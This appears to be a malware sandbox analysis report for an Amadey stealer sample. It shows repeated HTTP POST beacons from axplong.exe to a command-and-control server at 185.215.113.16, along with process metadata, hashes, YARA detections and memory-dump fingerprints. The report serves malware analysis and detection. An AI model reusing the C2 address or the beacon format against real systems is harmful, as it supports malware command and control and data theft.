                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 38 41 45 34 35 43 38 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9F8AE45C8FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                      Jul 27, 2024 09:35:57.263676882 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Sat, 27 Jul 2024 07:35:57 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      46192.168.2.649769185.215.113.16805608C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                      TimestampBytes transferredDirectionData
                      Jul 27, 2024 09:35:57.385561943 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 27, 2024 09:35:58.130425930 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Sat, 27 Jul 2024 07:35:58 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 27, 2024 09:35:58.131138086 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 160
                      Cache-Control: no-cache
                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 38 41 45 34 35 43 38 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9F8AE45C8FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                      Jul 27, 2024 09:35:58.376444101 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Sat, 27 Jul 2024 07:35:58 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      47192.168.2.649770185.215.113.16805608C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                      TimestampBytes transferredDirectionData
                      Jul 27, 2024 09:35:58.493488073 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 27, 2024 09:35:59.263596058 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Sat, 27 Jul 2024 07:35:59 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 27, 2024 09:35:59.264271021 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 160
                      Cache-Control: no-cache
                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 38 41 45 34 35 43 38 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9F8AE45C8FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                      Jul 27, 2024 09:35:59.557382107 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Sat, 27 Jul 2024 07:35:59 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      48192.168.2.649771185.215.113.16805608C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                      TimestampBytes transferredDirectionData
                      Jul 27, 2024 09:35:59.671575069 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 27, 2024 09:36:00.445875883 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Sat, 27 Jul 2024 07:36:00 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 27, 2024 09:36:00.446614027 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 160
                      Cache-Control: no-cache
                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 38 41 45 34 35 43 38 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9F8AE45C8FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                      Jul 27, 2024 09:36:00.698757887 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Sat, 27 Jul 2024 07:36:00 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      49192.168.2.649772185.215.113.16805608C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                      TimestampBytes transferredDirectionData
                      Jul 27, 2024 09:36:00.806575060 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 27, 2024 09:36:01.551214933 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Sat, 27 Jul 2024 07:36:01 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 27, 2024 09:36:01.576940060 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 160
                      Cache-Control: no-cache
                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 38 41 45 34 35 43 38 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9F8AE45C8FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                      Jul 27, 2024 09:36:01.822029114 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Sat, 27 Jul 2024 07:36:01 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      50192.168.2.649773185.215.113.16805608C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                      TimestampBytes transferredDirectionData
                      Jul 27, 2024 09:36:01.932753086 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 27, 2024 09:36:02.698842049 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Sat, 27 Jul 2024 07:36:02 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 27, 2024 09:36:02.736279964 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 160
                      Cache-Control: no-cache
                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 38 41 45 34 35 43 38 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9F8AE45C8FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                      Jul 27, 2024 09:36:02.988058090 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Sat, 27 Jul 2024 07:36:02 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      51192.168.2.649774185.215.113.16805608C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                      TimestampBytes transferredDirectionData
                      Jul 27, 2024 09:36:03.104902983 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 27, 2024 09:36:03.853441000 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Sat, 27 Jul 2024 07:36:03 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      52192.168.2.649775185.215.113.16805608C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                      TimestampBytes transferredDirectionData
                      Jul 27, 2024 09:36:03.962127924 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 160
                      Cache-Control: no-cache
                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 38 41 45 34 35 43 38 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9F8AE45C8FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                      Jul 27, 2024 09:36:04.722702980 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Sat, 27 Jul 2024 07:36:04 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      53192.168.2.649776185.215.113.16805608C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                      TimestampBytes transferredDirectionData
                      Jul 27, 2024 09:36:04.840260029 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 27, 2024 09:36:05.665412903 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Sat, 27 Jul 2024 07:36:05 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      54192.168.2.649777185.215.113.16805608C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                      TimestampBytes transferredDirectionData
                      Jul 27, 2024 09:36:05.674417973 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 160
                      Cache-Control: no-cache
                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 38 41 45 34 35 43 38 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9F8AE45C8FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                      Jul 27, 2024 09:36:06.430763960 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Sat, 27 Jul 2024 07:36:06 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Click to jump to process

                      Click to jump to process

                      Click to dive into process behavior distribution

                      Click to jump to process

                      Target ID:1
                      Start time:03:33:59
                      Start date:27/07/2024
                      Path:C:\Users\user\Desktop\9ICG2PuZbG.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Users\user\Desktop\9ICG2PuZbG.exe"
                      Imagebase:0x160000
                      File size:1'897'984 bytes
                      MD5 hash:C9774CB1F811AA79F9FDC173EE3DE6C1
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000001.00000002.2156374942.0000000000161000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000001.00000003.2116109167.00000000049E0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                      Reputation:low
                      Has exited:true

                      Target ID:2
                      Start time:03:34:01
                      Start date:27/07/2024
                      Path:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"
                      Imagebase:0xbe0000
                      File size:1'897'984 bytes
                      MD5 hash:C9774CB1F811AA79F9FDC173EE3DE6C1
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000002.00000003.2145696772.0000000004EA0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000002.00000002.2186678248.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                      Antivirus matches:
                      • Detection: 100%, Avira
                      • Detection: 100%, Joe Sandbox ML
                      • Detection: 53%, Virustotal, Browse
                      Reputation:low
                      Has exited:true

                      Target ID:3
                      Start time:03:34:01
                      Start date:27/07/2024
                      Path:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                      Wow64 process (32bit):true
                      Commandline:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                      Imagebase:0xbe0000
                      File size:1'897'984 bytes
                      MD5 hash:C9774CB1F811AA79F9FDC173EE3DE6C1
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000003.00000002.2186588517.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000003.00000003.2145827348.00000000053B0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                      Reputation:low
                      Has exited:true

                      Target ID:9
                      Start time:03:35:00
                      Start date:27/07/2024
                      Path:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                      Wow64 process (32bit):true
                      Commandline:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                      Imagebase:0xbe0000
                      File size:1'897'984 bytes
                      MD5 hash:C9774CB1F811AA79F9FDC173EE3DE6C1
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000009.00000002.3362421453.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000009.00000003.2723052390.0000000004D60000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                      Reputation:low
                      Has exited:false

                      Reset < >
                        Strings
                        Memory Dump Source
                        • Source File: 00000001.00000002.2159314694.0000000004BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BD0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_4bd0000_9ICG2PuZbG.jbxd
                        Similarity
                        • API ID:
                        • String ID: &hR7
                        • API String ID: 0-3538497471
                        • Opcode ID: 5156bd0afe6345d608b6e073ab7a79e8cb872c2a69c7b0e65ae6f3ec7dfd552d
                        • Instruction ID: 2c07ec1147e67cfd08b621775d0e2ebd070aae90f655fbb32e36faf824718599
                        • Opcode Fuzzy Hash: 5156bd0afe6345d608b6e073ab7a79e8cb872c2a69c7b0e65ae6f3ec7dfd552d
                        • Instruction Fuzzy Hash: E5F0ACB704C910BF970275968780EFA3A9AEE8323CB3580E9F41A47600B9A1BC40B991
                        Strings
                        Memory Dump Source
                        • Source File: 00000001.00000002.2159314694.0000000004BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BD0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_4bd0000_9ICG2PuZbG.jbxd
                        Similarity
                        • API ID:
                        • String ID: &hR7
                        • API String ID: 0-3538497471
                        • Opcode ID: 3f8136772c92ae116f2ed9fcd918c43e738b2e47fcf3f1fd02f88ba1fe16ac07
                        • Instruction ID: 0b00e82cad693177cd013f6f00db654612f9d541e13e4a35a95abc2a3768da0f
                        • Opcode Fuzzy Hash: 3f8136772c92ae116f2ed9fcd918c43e738b2e47fcf3f1fd02f88ba1fe16ac07
                        • Instruction Fuzzy Hash: 73F081F744C514BF960275559680EB63E9AEE9333DB3540E5F41743201B5A1BC40F991
                        Strings
                        Memory Dump Source
                        • Source File: 00000001.00000002.2159314694.0000000004BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BD0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_4bd0000_9ICG2PuZbG.jbxd
                        Similarity
                        • API ID:
                        • String ID: &hR7
                        • API String ID: 0-3538497471
                        • Opcode ID: b90c87c71c60765036b4448c2a7d7f4af901896056287e5ef82114de3edb4838
                        • Instruction ID: cdb32273364d86c198fb657c883bbbee7e3fed3443044680f8862340e07b7b12
                        • Opcode Fuzzy Hash: b90c87c71c60765036b4448c2a7d7f4af901896056287e5ef82114de3edb4838
                        • Instruction Fuzzy Hash: D2F08BFB44C510BFA60279919A80EFA3B9AFFD3339B3580E9F01643101B9B1AC41A991
                        Strings
                        Memory Dump Source
                        • Source File: 00000001.00000002.2159314694.0000000004BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BD0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_4bd0000_9ICG2PuZbG.jbxd
                        Similarity
                        • API ID:
                        • String ID: &hR7
                        • API String ID: 0-3538497471
                        • Opcode ID: 92e358a9c682fee1e582488fe14091e097f14552dc2f2f7724a8739523b3cc07
                        • Instruction ID: 2c8cf93c44ea51a4d9d738184bdbb9b117c3335565c86150ffdaed5b46518116
                        • Opcode Fuzzy Hash: 92e358a9c682fee1e582488fe14091e097f14552dc2f2f7724a8739523b3cc07
                        • Instruction Fuzzy Hash: 2CF04CB704C510BFD6067A558680DB93A69EE93339B3984E5F41687101BAA1BC41EA90
                        Strings
                        Memory Dump Source
                        • Source File: 00000001.00000002.2159314694.0000000004BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BD0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_4bd0000_9ICG2PuZbG.jbxd
                        Similarity
                        • API ID:
                        • String ID: &hR7
                        • API String ID: 0-3538497471
                        • Opcode ID: 02acc28a7a9a95afdc60ef1ee44428d7fca84dc43405428e2ec736f990695f3c
                        • Instruction ID: 7bf215fdffc87940a0d6071c2c51d1df6fd50c9630018e934a07551c1fc42d9c
                        • Opcode Fuzzy Hash: 02acc28a7a9a95afdc60ef1ee44428d7fca84dc43405428e2ec736f990695f3c
                        • Instruction Fuzzy Hash: E2F05CF744C8106E9211B56599C0BFA3A99EEE2739B3584E9E0168320179A0BC41A991
                        Strings
                        Memory Dump Source
                        • Source File: 00000001.00000002.2159314694.0000000004BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BD0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_4bd0000_9ICG2PuZbG.jbxd
                        Similarity
                        • API ID:
                        • String ID: &hR7
                        • API String ID: 0-3538497471
                        • Opcode ID: e3bf8a5c9cbeef3a373295238a6180abc6eae449a6a1c0641503c94576616d88
                        • Instruction ID: f8c86f768cb33256f86beb85fb9809f784e1f6fc44cefe72526e9d279b14a498
                        • Opcode Fuzzy Hash: e3bf8a5c9cbeef3a373295238a6180abc6eae449a6a1c0641503c94576616d88
                        • Instruction Fuzzy Hash: 4BF05CF744C8106E9211B6659AC4FFA3A99EEA2739B3584E9E0169310179A0B801A991
                        Strings
                        Memory Dump Source
                        • Source File: 00000001.00000002.2159314694.0000000004BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BD0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_4bd0000_9ICG2PuZbG.jbxd
                        Similarity
                        • API ID:
                        • String ID: &hR7
                        • API String ID: 0-3538497471
                        • Opcode ID: aee602f3f5db832b4ca05e2aa862618baf5b5146b1f30e13dd4a34ff0ba8ffee
                        • Instruction ID: 0e6f47874b01ec0d28e3199428913f4f6fd77ce26897dc523d417ebab6ee29fa
                        • Opcode Fuzzy Hash: aee602f3f5db832b4ca05e2aa862618baf5b5146b1f30e13dd4a34ff0ba8ffee
                        • Instruction Fuzzy Hash: 32E0ABF788DC006FD701B610C6C0AFA3BA5EF8A338B3900ECD4040B100B924AC06EA90
                        Memory Dump Source
                        • Source File: 00000001.00000002.2159314694.0000000004BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BD0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_4bd0000_9ICG2PuZbG.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 9d2213019f49945214b5d7cecafdeea695c1a30da40aa6ecfb437dc7236c3a28
                        • Instruction ID: 6827b89453edf1e3987eb4a89907ec0e713bfe651160d83ae5094e66d9529b81
                        • Opcode Fuzzy Hash: 9d2213019f49945214b5d7cecafdeea695c1a30da40aa6ecfb437dc7236c3a28
                        • Instruction Fuzzy Hash: CFF0E2E278D63AAF9043748A07425F22A5FE59F63CF2400D1B40B8EA81F6E4BA1170E1

                        Execution Graph

                        Execution Coverage:6.3%
